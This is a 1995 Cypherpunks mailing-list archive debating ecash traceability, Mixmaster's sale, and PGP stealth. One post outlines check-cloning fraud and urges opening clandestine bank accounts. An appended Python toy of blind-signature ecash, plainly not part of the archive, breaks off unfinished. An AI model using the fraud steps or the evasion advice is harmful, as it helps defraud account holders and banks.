Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
From starrd at iia2.org Thu Sep 14 19:29:27 1995
From: starrd at iia2.org (starrd)
Date: Thu, 14 Sep 95 19:29:27 PDT
Subject: Scientology and police visit XS4ALL Amsterdam
In-Reply-To: <199509130156.LAA29400@molly.cs.monash.edu.au>
Message-ID:

On Wed, 13 Sep 1995, Jiri Baum wrote:
>
> I feel I should point out that you have no proof that the text you have
> attributed to me was in fact posted by me, and in fact you have reason
> to believe otherwise since I usually PGP-sign my entire post including
> any signature.
>

Wasn't a flame my friend.....wasn't meant as one either.

> Off topic, but I have been publicly accused so I feel I should publicly
> respond in the same forum.
>

no problem :-^)

||||||||||||email address: starrd at iia2.org or starrd at cinenet.net|||||||||||
| Creator of the original                       | Get paid to upload      |
| Patriot's Archives                            \ shareware to BBSes and  |
| ftp: iia.org /pub/users/patriot                \_____ the Internet!     |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\ Get file:          |
| For index of available files: descript.ion          \ uploader.zip      |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

From bdavis at thepoint.net Thu Sep 14 19:52:46 1995
From: bdavis at thepoint.net (Brian Davis)
Date: Thu, 14 Sep 95 19:52:46 PDT
Subject: cryptography eliminates lawyers?
In-Reply-To: <199509142253.SAA63671@tequesta.gate.net>
Message-ID:

On Thu, 14 Sep 1995, Jim Ray wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
>
> Brian Davis wrote:
> >
> > >Just wondering about liability issues after state accrediting is dead.
> > >
> >
> Despite loud squawking, "chaos" will not ensue. Instead, the private
> sector will take over assessing risk, which it has always done better.
>
> An example: I'd rather jump into a full bathtub with a plugged-in,
> UL [Underwriter's Laboratories] certified TV set than take the FDA
> approved (but very dangerous, IMO) prostate drug called "Proscar."
> While there is only one UL (by choice, not force) and only one FDA
> (by force, not choice) I can easily imagine a lawyer-certifying
> companies like UL for appliances, probably tied [like UL] to the
> insurance industry. [I am not a lawyer, or a doctor either.]
> JMR

Last I checked, FDA, UL, or state bar association approval does not *require* you to take, use, or hire the approved drug, toaster or lawyer. Market forces are still at work, albeit in a filtered environment. Just a first cut. And even that can usually be gotten around.

EBD

From hallam at w3.org Thu Sep 14 20:11:58 1995
From: hallam at w3.org (hallam at w3.org)
Date: Thu, 14 Sep 95 20:11:58 PDT
Subject: Explaining Zero Knowledge to your children
In-Reply-To:
Message-ID: <9509150310.AA32542@zorch.w3.org>

The cave analogy sucks. The way I tried to explain Zero Knowledge is this:

Imagine that you have a duplicator device which you want to sell, you don't want to explain why it works to the buyer however since then they would just make their own (patents have been abolished by this time). You also don't want the buyer to be able to prove to anyone else that you have a duplicator.

So what you do is you play the "what hand is it in game" and you do this with a 10$ bill provided by the buyer and who records its serial number. You hold the original article in one hand and the duplicate in the other.
The buyer chooses one hand, you show the article in that hand. The buyer knows you had a 50:50 chance of a lucky guess so you do it again, each time the probability of getting it right by a lucky guess halves. After 10 tries or so it is virtually certain that you were not faking.

Any better ideas...

Phill

From hallam at w3.org Thu Sep 14 20:22:10 1995
From: hallam at w3.org (hallam at w3.org)
Date: Thu, 14 Sep 95 20:22:10 PDT
Subject: DD, pedaphiles, and Terrorists, oh my
In-Reply-To: <199509150006.UAA17827@book.hks.net>
Message-ID: <9509150321.AA28976@zorch.w3.org>

>ANYBODY on this list seen some real kiddy porn on the net? I am talking
>intercourse, etc., not scans of six year olds from the Sears catalog, or
>naked boys building sandcastles on the beach.

Yes, I was specifically referring to hard core images depicting intercourse with minors, including very young children. This was injected into the USEnet over a period of about 3 months from a number of sites. I do not know if the persons arrested today are the alleged source.

Phill

From robo at c2.org Thu Sep 14 20:57:55 1995
From: robo at c2.org (ROBO Mixmaster Remailer)
Date: Thu, 14 Sep 95 20:57:55 PDT
Subject: Mixmaster status
Message-ID: <199509150345.UAA16323@infinity.c2.org>

Flame Remailer wrote:
> Subject: Mixmaster status
>
> There has been an offer to purchase and commercially develop Mixmaster.
> This will hasten the development of Mixmaster for other platforms (e.g.
> DOS, Windows, Macintosh), and bring significant improvements to the
> interface, but I will not compromise on the level of security provided by
> Mixmaster. Free client software will continue to be available.
>
> This could be the big breakthrough for remailers, finally thrusting them
> out of the hobbyist's closet into the corporate world.
>
> I wonder. Where is the commercial market for remailers? Who has an
> application for them except hobbyists? Why would there be a commercial
> incentive to run a mixmaster server, or even a client?
>
> Could this "offer" be a red herring?

I wondered the same thing myself. It would certainly be a more cost-effective way for the NSA to compromise Mixmaster technology than by brute force.

Consider this scenario ... Mixmaster gets bought by the Acme Crypto Company of Ft. Meade, MD. They "improve" it, and offer a new version. It's even FREE (for non-commercial use)! But their "improvements" make it incompatible with previous versions, and so you have to upgrade. The new "commercial" version comes with no SOURCE CODE, of course...

From shamrock at netcom.com Thu Sep 14 21:25:35 1995
From: shamrock at netcom.com (Lucky Green)
Date: Thu, 14 Sep 95 21:25:35 PDT
Subject: [non-crypto] Any info on Motorola Digital cell phone?
Message-ID: <199509150423.AAA19333@book.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

Well, I finally broke down and bought a cell phone. Motorola Digital 52134 flip style. Would the (numerous) cell phone pros on this list please get in touch with me and teach me the things not mentioned in the manual?

Thanks guys and gals,

--
-- Lucky Green PGP encrypted mail preferred.

---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From hfinney at shell.portal.com Thu Sep 14 22:34:01 1995
From: hfinney at shell.portal.com (Hal)
Date: Thu, 14 Sep 95 22:34:01 PDT
Subject: Why ecash is traceable
Message-ID: <199509150532.WAA08865@jobe.shell.portal.com>

There has been considerable discussion on sci.crypt and on the cypherpunks list about the fact that currently proposed digital cash is "traceable", or to put it another way, that there is no payee anonymity.
This is an annoying asymmetry, where the payor is protected more than the payee. But there is a fundamental reason for this, which I want to explain here. It is not just perversity on the part of digital cash designers.

The problem is that there is a conflict between the desire for payee anonymity and the need to prevent double spending. And preventing double spending is far more important, since without that the cash would be worthless. Here is how the conflict occurs.

Suppose Alice has a piece of digital cash which she wants to spend with Bob. She goes through some protocol and transfers data to him. Bob, then or later, sends some resulting data to the bank and gets his account credited. Now if Alice spent that same coin with Charlie, we need to have the bank find it out. When Charlie deposits his data with the bank, and the bank compares that with what Bob sent in, there must be a red flag that goes up.

The fundamental requirement of preventing double spending implies that Bob's and Charlie's data, when sent to the bank, has some correlation which will identify the fact that they both come from the same coin. It doesn't matter exactly what the form of this data is, or how it has been blinded and stirred, but if double spending is to be detected there must be a correlation which the bank can see.

But this correlation is what makes the coin traceable. Suppose Alice is paying a coin to Bob via an anonymous network, and she and the bank are going to try to figure out who he really is. She goes through the payment transaction, and Bob sends his resulting data to the bank. Before doing so, though, Alice simulates a payment of the same coin to Charlie. Charlie doesn't actually have to be involved, Alice can just go through what she would have done if she had spent the coin elsewhere. The result of this simulated payment has been shared with the bank.
Now, when Bob deposits his data, the bank compares it with the data Alice sent, the result of her simulated spending of the same coin. By the argument presented above, Bob's deposit will be flagged. It will correlate with the data Alice sent in since this will be the equivalent of a double-spending. So when Bob makes the deposit he can be linked to the specific coin payment which Alice made, and his anonymity is lost.

It would seem that any system which is capable of detecting double-spending just from the information which the payees send in to the bank would be vulnerable to this. Systems which use tamper-proof observer chips to prevent double spending beforehand can avoid it, but of course if someone breaks an observer the whole cash system might crash. In general it does not look like payee anonymity is possible without giving up other very important features.

Hal Finney
hfinney at shell.portal.com

From tcmay at got.net Fri Sep 15 00:14:56 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 15 Sep 95 00:14:56 PDT
Subject: Why ecash is traceable
Message-ID:

Hal, a very nice summary! I have some questions, though.

At 5:32 AM 9/15/95, Hal wrote:
>The problem is that there is a conflict between the desire for payee
>anonymity and the need to prevent double spending. And preventing
>double spending is far more important, since without that the cash would
>be worthless. Here is how the conflict occurs.

Agreed, any system which makes double spending possible results in a currency collapse as the currency becomes worthless. Chaum points out that there "is no digital coin," that is, that software (numbers) must by their nature be easily copyable. Thus, any system to prevent double (triple, quadruple, etc.) spending must take this into account.

Why not "online clearing" as the preferred model, then? To use your example:

>Suppose Alice has a piece of digital cash which she wants to spend with
>Bob. She goes through some protocol and transfers data to him.
>Bob,
>then or later, sends some resulting data to the bank and gets his
>account credited. Now if Alice spent that same coin with Charlie, we
>need to have the bank find it out. When Charlie deposits his data with
>the bank, and the bank compares that with what Bob sent in, there must
>be a red flag that goes up.

With online clearing, Bob sends his data to the relevant bank, confirms that his account has been credited, and tells Alice that her "check has cleared," so to speak, and the transaction is completed. Then, when Alice tries to spend the "same" digital cash with Charlie, he sends his data to the bank and the bank tells him the money has already been spent. Charlie informs Alice that the transaction has failed, that her money is no good.

I'm not claiming this is how Chaum's currently-available system works, only that nothing in Chaum's scheme hinges on a True Name, of course.

So with online clearing, the second spending is blocked, but there is still no leakage of identity, is there?

>The fundamental requirement of preventing double spending implies that
>Bob's and Charlie's data, when sent to the bank, has some correlation
>which will identify the fact that they both come from the same coin.
>It doesn't matter exactly what the form of this data is, or how it has
>been blinded and stirred, but if double spending is to be detected
>there must be a correlation which the bank can see.

I agree. But this is like the following analogy:

Alice has a special kind of money, called a "train locker combination." This special kind of money is the location of a storage locker and the combination of a lock on the locker. She "spends" this special kind of money by giving this information to the person she is paying.

The recipient has a couple of basic options:

1. Send someone to verify that the locker contains the specified goods, at which point the transaction is completed. This is equivalent to ONLINE CLEARING.
(I'm not going to get into the situation where he gets the money, then cancels or reneges on the deal....this is a possibility in "cash" transactions as well, save with escrow schemes, and even then...)

2. Accept the word of Alice (in the sense of not actually transferring the money via online clearing) and count on systems which implicate her if she tries to spend the money a second time, i.e., tries to tell someone else the locker and combination.

(The "observer chip" option Chaum raises, and which may have a parallel here, I'm not considering. I'm deeply suspicious of solutions calling for tamper-resistant hardware...just not very strong by cryptographic standards, etc. Maybe I'm just ignorant, but the observer chip approach Chaum described in his "Scientific American" article a few years ago was unconvincing to me.)

The elegance of the first option, online clearing, is that Alice is motivated to keep her secret information (the money) secret, and that once it is "spent," or cleared and transferred, there's no going back. She can't renege, she can't collude with the bank to see where it went.

The bank, upon valid receipt of an order to "cash" the "check" then could place the money in an "envelope" (in Chaum's terms) supplied by Bob and then post it in a message pool. (Bob can submit his claim to the money via remailers, and receive the money-in-envelope via remailer return replies (if they ever get perfected, as I suspect they will be) or via message pools. Bob receives the envelope and reverses the blinding operation, thus having cash not traceable to him in any way.

I'm persuaded that the second approach, involving protocols for revealing double spending, is much messier than the "he who gets there first" protocol.
The online clearing model largely emulates how real physical cash works, where there is a direct transfer, where the cash must be protected against loss (lose it and you're just out of luck, unlike, say, as with traveller's checks, which are account-based), and where a kind of "online clearing" is actually done when the cash is checked to see if it's counterfeit.

>But this correlation is what makes the coin traceable. Suppose Alice is
>paying a coin to Bob via an anonymous network, and she and the bank
>are going to try to figure out who he really is. She goes through the
>payment transaction, and Bob sends his resulting data to the bank.
>Before doing so, though, Alice simulates a payment of the same coin to
>Charlie. Charlie doesn't actually have to be involved, Alice can just
>go through what she would have done if she had spent the coin elsewhere.
>The result of this simulated payment has been shared with the bank.

With online clearing, this kind of "sting" by Alice is impossible (at least in the way described here). Alice pays Bob, Bob sends his data to the bank, the bank reports the money has already been transferred (or, simply reports back "invalid transaction").

An account-based system, one that doesn't do online clearing, will need the correlation that Hal cites. An online system will not...whoever gets to the money first gets it, as with real cash.

(There are more abstract ways of viewing this advantage. While mere software is always duplicable, and cash numbers are of course duplicable, one thing that is not duplicable is this: "the first agent to present a valid number at this bank." There can be only one of these, and this uniqueness is what keeps the currency from collapsing, what introduces _conservation_ into the system.)

>Now, when Bob deposits his data, the bank compares it with the data
>Alice sent, the result of her simulated spending of the same coin. By
>the argument presented above, Bob's deposit will be flagged.
It will >correlate with the data Alice sent in since this will be the equivalent >of a double-spending. So when Bob makes the deposit he can be linked to >the specific coin payment which Alice made, and his anonymity is lost. Well, since Alice knows her own blinding factors, she will always be able to say to the bank: "My cash will look like this. Watch for it." The key is for Bob to take the cash Alice gives him and communicate to and from the bank with mixes, as described above. Bank / \ / \ / \ Alice - - - Bob (Sorry I can't flesh out this diagram....ASCII just won't cut it. Mere English is even worse at describing these transactions.) Another elegant way of viewing things: If Alice colludes with the bank, by doing a fake-spend with the fake "Charlie," or by reporting to the bank what her blinding factor will be and hence what "her" cash will look like, then effectively the transaction collapses to: Alice/Bank \ \ \ Bob But if Bob can get cash from the bank that the bank cannot trace, via the blinding factors, then Bob can get cash from the Alice/Bob collusion. The fact that Alice can correlate a particular transaction to Bob's contact with the bank can be defeated by Bob using anonymous remailers to protect his identity. My Apologies: I suspect I've been rambling a bit, thinking out loud by typing. There are different issues involved here: offline vs. account-based systems, the use of remailers and message pools to sever the links between transactions and identities, and the (mostly unmentioned) role of third-part escrow agents and "anonymizers." (Think of what happens when online clearing is used to shuttle the cash between N different agents...even if Alice is colluding, will Candy, Devon, Eric, Floyd, etc. all be in the same collusion set?) >It would seem that any system which is capable of detecting double- >spending just from the information which the payees send in to the bank >would be vulnerable to this. 
Systems which use tamper-proof observer >chips to prevent double spending beforehand can avoid it, but of course >if someone breaks an observer the whole cash system might crash. In >general it does not look like payee anonymity is possible without giving >up other very important features. I don't think all systems must be able to deal with double spending. For example, the first person to read this number: 45%2)d[12ks&Qmdx and to then submit it any form--in person, by e-mail, via remailer, etc.--to The First Bank of Cyberspace will have $10 sent to him or her, as cash or as a spendable amount of digicash (untraceable to recipient, of course). Where's the payee traceability that I, the payer, have? (The key is that I don't have to deal with double spending, as there is only one "first person to ....") I believe Chaum has thought about the issues in creating "Pure Digital Cash." While a pure "digital coin" may not be possible, I believe a two-way untraceable digital cash system is possible. Frankly, I think Chaum's work on DC-Nets points the way, though even simpler realizations may be enough for practical purposes. My hunch, just a hunch, is that Chaum has been concentrating on the particular protocols which avoid online clearing and which avoid avoid the payer/payee untraceability for pragmatic reasons. Pragmatic as in "politically wise." --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From stewarts at ix.netcom.com Fri Sep 15 00:26:14 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 15 Sep 95 00:26:14 PDT Subject: PGP in UK - snooped as unSTEALTHed? 
Message-ID: <199509150725.AAA11217@ix3.ix.netcom.com>

At 06:29 AM 9/12/95 -0400, Perry wrote, replying to Gary:
>> When are the PGP designers and coders going to get serious
>> and develop STEALTH PGP inside PGP itself!?
>Never, I hope. It would dramatically lower the utility of the
>system. Can you imagine how disgusting it would be to try decrypting
>something if you have a dozen keys outstanding?

I disagree - if it's done right, the degree of stealth can be
user-selectable, and even moderately stealthy options can tell which key
to use without giving away much information. (For instance, 4 bits of
keyid isn't very revealing, but will tell you which one or two of your
dozen keys to try.) Have the most non-stealth options indicate that it's
PGP-encrypted and addressed to keyid 0x12345678, Joe User, blah, blah.

The basic problem is that stealth wasn't an original design criterion, so
many parts of the PGP data format reveal at least that PGP is being used,
and occasionally other information as well. Some things are easy to work
around (----- BEGIN PGP etc.), and some aren't. Changing this takes a
substantial amount of redesign.

>Not to mention how
>hard it would be to deal with figuring out that you should even try to
>decrypt things in the first place.

As you say a couple paragraphs later:
>If someone sees a bunch of random numbers in mail sent by me, it's going
>to be pretty obvious what the hell is inside anyway.
Similarly, if someone emails you a bunch of random numbers....

>I very much see this whole thing as a non-issue.

Most of the time, for most users now, it's not an issue. But there are
people who will need to hide encrypted messages, and as anti-privacy laws
in the US become stronger, that may be us. Is this an issue for PGP 3.0.1,
or an issue for Privacy:TNG? Probably the latter, given the state of the
PGP world, and certainly ranting at the developers to do it now is uncool.
But it should be a design goal.

#---
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From unicorn at polaris.mindport.net  Fri Sep 15 00:27:55 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Fri, 15 Sep 95 00:27:55 PDT
Subject: Check Cloning frenzy and attack on anonymous accounts
Message-ID:

Cypherpunks might want to take note of the recent flurry of news program
stings on banks which do not demand 12 pieces of identification in order
to open an account. The latest horseman, check "cloners."

Two networks have now run hidden camera stings on banks where they offer
all manner of obnoxious fake identification and open accounts in silly
names. The "purpose" being to expose the ease with which a dreaded check
"cloner" can open an account to transfer your funds into.

The process goes something like this:

Check cloner gets account number from ATM slip or otherwise.

Check cloner prints up 30 "checks" in any name at all with magnetic ink
account number on the bottom for the benefit of automatic readers at the
bank.

Checks are written to the account in false name and withdrawn.

For some reason, the focus seems to be on the ease with which one opens an
account- rather than with the need to safeguard account information, and
the lack of oversight by banks. Of course, the liability for these crimes
is with the bank, which cleared a check without the proper signature.

Of course, the immediate solution, rather than ensuring the banks pay
their liability for their insecure payments and check clearing system, and
their printing account information on any piece of paper they can find, is
going to be a crackdown on account identification- and probably
legislation. (Note that often banks take months to pay the shortfall- when
they do at all).

New accounts can expect to have to cough up significant identification and
I predict a renewed call for national identification credentials.
Tell the banks they have to pay within 2 days of the presentation by the
duped depositor of the fraudulent checks and I would lay odds that the
banks would be screaming bloody murder for a more secure payments and
check clearing system than the trash they have now.

Of course, because of the ignorance of the media, this will never happen.
Of course, paying in cash will never be looked to as an answer either.

Typical creeping statism.

I suggest those of you who open clandestine accounts open a flurry now,
before things get tough.

From loki at obscura.com  Fri Sep 15 01:06:28 1995
From: loki at obscura.com (Lance Cottrell)
Date: Fri, 15 Sep 95 01:06:28 PDT
Subject: Mixmaster status
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

I apologize for being so terse in my first message. This is not a red
herring. The organization that has approached me is very pro-privacy and
anonymity. I see nothing but good coming from this venture. I will be very
active in the development of the commercial version of Mixmaster.

Let me be crystal clear.
1) I will not support any version of Mixmaster that is weakened.
2) All future clients will be able to generate the current message format.
3) All future servers will be able to read the current message format.
4) There will always be a free version of the client with source code.

While I have not discussed it, I can not imagine that there would not also
be a free version of the server code (with source). Without remailers what
is the point of the client software?

At 8:45 PM 9/14/95, ROBO Mixmaster Remailer wrote:
>Flame Remailer wrote:
>
>> Subject: Mixmaster status
>>
>> There has been an offer to purchase and commercially develop Mixmaster.
>> This will hasten the development of Mixmaster for other platforms (e.g.
>> Dos, Windows, Macintosh), and bring significant improvements to the
>> interface, but I will not compromise on the level of security provided by
>> Mixmaster. Free client software will continue to be available.
>>
>> This could be the big breakthrough for remailers, finally thrusting them
>> out of the hobbyist's closet into the corporate world.
>>
>> I wonder. Where is the commercial market for remailers? Who has an
>> application for them except hobbyists? Why would there be a commercial
>> incentive to run a mixmaster server, or even a client?
>>
>> Could this "offer" be a red herring?
>
>I wondered the same thing myself. It would certainly be a more
>cost-effective way for the NSA to compromise Mixmaster technology
>than by brute force.
>
>Consider this scenario ... Mixmaster gets bought by the Acme
>Crypto Company of Ft. Meade, MD. They "improve" it, and offer a new
>version. It's even FREE (for non-commercial use)! But their
>"improvements" make it incompatible with previous versions, and so
>you have to upgrade. The new "commercial" version comes with no
>SOURCE CODE, of course...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMFkzR/Pzr81BVjMVAQH6hAf+O+QdTEzNjUh0FYlJEnCakNws4MxPrOt4
miMPaz/aWDOReGb62UPZAEMNXP+hjgy0kTjW4xReTTBAPgtcsInr1Cct6MPr3O/r
PGMGmE9z2Fkv3/k7MDG1NiptT2/RwVtmDikIJEQuH5j8ijir28Vvrk9Vs685Qc3j
bFz5Q8uRLd57Uk51tQwIiBM6CJ4suQ3WFN++QNTHM9E47J9W8yFBux6ePWPlZOK8
8BnKkhY/auPm85X3MVZhL3y7F6zbFuqPpZrsKpwOOkme8o4l71t2xyhGcZHHxiB7
JLF2As9pNXsKWpYiPZEHTV9hsgxQTHortdhq25DeGyoxhZSrZByP/w==
=+O16
-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra. Suddenly it flips over,
pinning you underneath. At night the ice weasels come." --Nietzsche
----------------------------------------------------------

From don at cs.byu.edu  Fri Sep 15 01:48:22 1995
From: don at cs.byu.edu (Donald M. Kitchen)
Date: Fri, 15 Sep 95 01:48:22 PDT
Subject: Why ecash is traceable
Message-ID: <199509150847.CAA03047@bert.cs.byu.edu>

-----BEGIN PGP SIGNED MESSAGE-----

Excellent discussion on the subject, actually. However, your idea of the
"first person to the bank" maintaining anonymity via remailer block is
flawed. First of all, if a collusion with the bank is being taken into
account, presumably sufficient enough resources are involved that someone
may try and track the reply block. Mixmaster (as your messages mentioned
by name) would be necessary to eliminate the chance of tracking the block
through combinations of replay attacks etc. (Which reminds me, has anyone
implemented an Expiration date on Type I remailers yet?? I remember
someone telling me it was being put into the RFC) However, mix does not
have a reply block system. Nor are there any Type I -> Mix gateways, for
reasons mentioned months ago. (PS, For historical sake, I was a strong
supporter of a Shamir Sharing Shell Game[tm] with the type I message.
Everything during those months came out of a rant program, so I can hardly
expect you to have saved them)

Soooo... Anyone up for a Shamir Sharing Shell game? Of course, a drop box
system would be *much* sexier. Combined with, say, an encrypted socket, or
maybe MIXing a packet straight to your door. (Every client a mix site,
remember? Just make yourself a mix key and give it to the drop box. I
figure if the TLA has you by then, you might as well trust the drop-box
operator too)

ObMiscCrypto: Cypherpunk archives seem to have been down for a month, and
a mailto:// didn't wake anybody up. I got a message from Bob Silverman,
apparently he would not be opposed to giving his software to the C-punk
key Cracking Ring, Inc. as a group on the understanding that the group
lend him some factored numbers. He reports having no PGP key, so getting a
PGP sig won't be happening.
Perhaps someone who knows him or someone who knows about factoring
software would volunteer to get the goods?

ObHiMom: Hi Mom.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMFk9cMLa+QKZS485AQHEpgL8C2N2eioUPaMqLlbzFL29F5zvq50J1o1+
nyoVxV51U4mglT40J8XZmF3/+15mN0aDbbA1NbOzd/7x20TeXnOwGGRHB2iHF0NB
k++VRMrwX85MZ5snlf/c0l5XGnxKEuU6
=7hGk
-----END PGP SIGNATURE-----

fRee cRyPTo! jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don or PubKey servers (0x994b8f39)
June 7&14, 1995: 1st amendment repealed.
Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *

From stewarts at ix.netcom.com  Fri Sep 15 02:08:39 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 15 Sep 95 02:08:39 PDT
Subject: DD, pedophiles, and Terrorists, oh my
Message-ID: <199509150908.CAA22145@ix3.ix.netcom.com>

At 11:21 PM 9/14/95 -0400, Phill wrote:
>Yes, I was specifically referring to hard core images depicting intercourse with
>minors, including very young children. This was injected into the USEnet over a
>period of about 3 months from a number of sites. I do not know if the persons
>arrested today are the alleged source.

Anybody interested in doing a FOIA to find out whether the government is
posting them? For that matter, is the Post Office, as a
semi-non-governmental organization, subject to FOIA?

#---
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From stewarts at ix.netcom.com  Fri Sep 15 02:08:46 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 15 Sep 95 02:08:46 PDT
Subject: Why ecash is traceable
Message-ID: <199509150908.CAA22153@ix3.ix.netcom.com>

I first reacted to Hal's posting about the way Tim did. I got confused by
the "Charlie" issue, but I think I see it.

>Why not "online clearing" as the preferred model, then?

It's probably still possible to do _some_ tracing in an online system.
As in the previous example, Alice is going to conspire with the bank to
catch Bob, _before_ she pays Bob the money; afterwards is too late.
Alice creates an account Alice2 and spends the cash. Then she pays Bob the
same cash. When Bob tries to deposit it, the bank notices it's already
been spent, and does one of
1) rejects the payment using the normal double-spending prevention (not
very useful for kidnapping/ransom cases, since Bob may kill the victim or
whatever)
2) detects the double-spending but uses special-case software to tell Bob
they're accepting the payment, and trace his account or trace the place
he's depositing it from, or not actually credit him the money they're
sending him a receipt for, or whatever.

If Bob wants to prevent the bank from tracing his deposit back to him,
he'll need an anonymous on-line connection; this would probably need to be
some sort of packet laundry, which is easy enough to implement, or at
least a fancy firewall. If Bob is a real Bad Guy (as opposed to Alice
being the Bad Guy), Bob will probably set up some kind of temporary
account at the bank to deposit the money in, followed rapidly by
withdrawing the money and abandoning/closing the account. If Bob is a
kidnapper, he probably kills the kid; if he's just an undocumented
retailer, he may not ship the pharmaceuticals, or may start announcing
that Alice is a probable narc.

>[online clearing vs. double-spender detection]
>I'm persuaded that the second approach, involving protocols for revealing
>double spending, is much messier than the "he who gets there first"
>protocol.
>The online clearing model largely emulates how real physical cash

There are difficulties, with online clearing, though - with physi-cash,
Bob can look at it and say "it looks good/bad" without actually
possessing it; with online clearing, he can lie about "it was pre-spent",
and there's no way to let him check the cash except by either giving it to
him or using messy all-or-nothing-disclosure-of-secrets techniques (e.g.
Alice and Bob flip a coin to decide whether Bob gets to spend a
pre-committed digibuck or Alice gets to demonstrate that it's ok and spend
it first) though an online system could reduce this problem substantially
by recording the time that a given digicash was spent and reporting that
time in double-spending rejections (a first-spending at approximately the
same time that Alice gives Bob the money and he deposits it is obviously
suspicious; it doesn't actually identify which one of them cheated, though
they'll both know (unless it was the bank cheating). A first-spending time
substantially before that implicates Alice.)

>Well, since Alice knows her own blinding factors, she will always be able
>to say to the bank: "My cash will look like this. Watch for it."

Unfortunately, it's probably a lot harder to design a blinding system that
lets the payee blind the cash without allowing him to create forged bills
(at least forged bills based on a hard-to-identify original bill.)

>My hunch, just a hunch, is that Chaum has been concentrating on the
>particular protocols which avoid online clearing and which avoid the
>payer/payee untraceability for pragmatic reasons. Pragmatic as in
>"politically wise."

maybe so...
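An added example for the online-clearing discussion in Tim May's and Bill Stewart's posts above (it is not code from either post, nor Chaum's or any bank's): a toy Chaum-style blind-signature coin whose bank clears deposits online, so the first valid presentation wins. It shows the points the two posts argue over: that from its own records the bank cannot link a deposited coin to a withdrawal, that it can once Alice hands over her blinding factor ("My cash will look like this. Watch for it."), that a second presentation simply bounces, and Bill's Alice2 sting, where the first-spend time the bank reports on the bounce predates the payment and so points at Alice rather than Bob. The 96-bit RSA primes, the Miller-Rabin routine, the SHA-256 full-domain hash and the pseudonymous channel strings are all assumptions of this demo, not part of any real cash system.

```python
"""Toy Chaum-style blind-signature coin with online clearing ("the first agent
to present a valid number at this bank" is credited; later presenters bounce).
Assumptions of this example: demonstration keys (96-bit primes, textbook
Miller-Rabin) and a pseudonymous string standing in for the anonymous channel."""
import hashlib
import random
from math import gcd

def is_probable_prime(n, rounds=16):
    """Miller-Rabin; adequate for a demo key, not for real key generation."""
    if n < 4 or n % 2 == 0:
        return n in (2, 3)
    d, s = n - 1, 0
    while d % 2 == 0:
        d, s = d // 2, s + 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def rand_prime(bits):
    cand = random.getrandbits(bits) | (1 << (bits - 1)) | 1
    return cand if is_probable_prime(cand) else rand_prime(bits)

def gen_rsa(bits=96, e=65537):
    """The bank's signing key (n, e, d)."""
    while True:
        p, q = rand_prime(bits), rand_prime(bits)
        phi = (p - 1) * (q - 1)
        if p != q and gcd(e, phi) == 1:
            return p * q, e, pow(e, -1, phi)

def coin_hash(serial, n):
    """The 'number' on a coin: H(serial) mapped into Z_n."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % n

class Bank:
    def __init__(self):
        self.n, self.e, self.d = gen_rsa()
        self.withdrawals = []  # blinded values the bank signed: all it ever sees
        self.spent = {}        # serial -> (first-spend time, payee channel)

    def sign_blinded(self, blinded):
        """Withdrawal: sign the sealed 'envelope' without seeing the coin inside."""
        self.withdrawals.append(blinded)
        return pow(blinded, self.d, self.n)

    def deposit(self, serial, sig, channel, now):
        """Online clearing; a bounce reports the first-spend time (Bill's suggestion)."""
        if pow(sig, self.e, self.n) != coin_hash(serial, self.n):
            return ("invalid", None)
        if serial in self.spent:
            return ("already-spent", self.spent[serial][0])
        self.spent[serial] = (now, channel)
        return ("accepted", now)

    def can_link_alone(self, serial, sig):
        """The bank's records hold only blinded values, never the coin or its signature."""
        h = coin_hash(serial, self.n)
        return any(w in (h, sig) for w in self.withdrawals)

    def can_link_with_payer(self, serial, sig, r):
        """Alice/bank collusion: with r the bank recomputes what 'her' coin looked like."""
        target = coin_hash(serial, self.n) * pow(r, self.e, self.n) % self.n
        return target in self.withdrawals

def withdraw(bank):
    """Payer side: pick a serial, blind H(serial) with r, get it signed, unblind."""
    n, e = bank.n, bank.e
    serial = random.getrandbits(128).to_bytes(16, "big")
    while True:
        r = random.randrange(2, n)
        if gcd(r, n) == 1:
            break
    blinded = coin_hash(serial, n) * pow(r, e, n) % n
    sig = bank.sign_blinded(blinded) * pow(r, -1, n) % n  # == H(serial)^d mod n
    return serial, sig, r

def honest_payment(bank):
    """Alice pays Bob, who clears at once via a mix; Alice then tries 'Charlie'."""
    serial, sig, r = withdraw(bank)
    bob = bank.deposit(serial, sig, "bob-via-mix", now=10)
    charlie = bank.deposit(serial, sig, "charlie", now=11)
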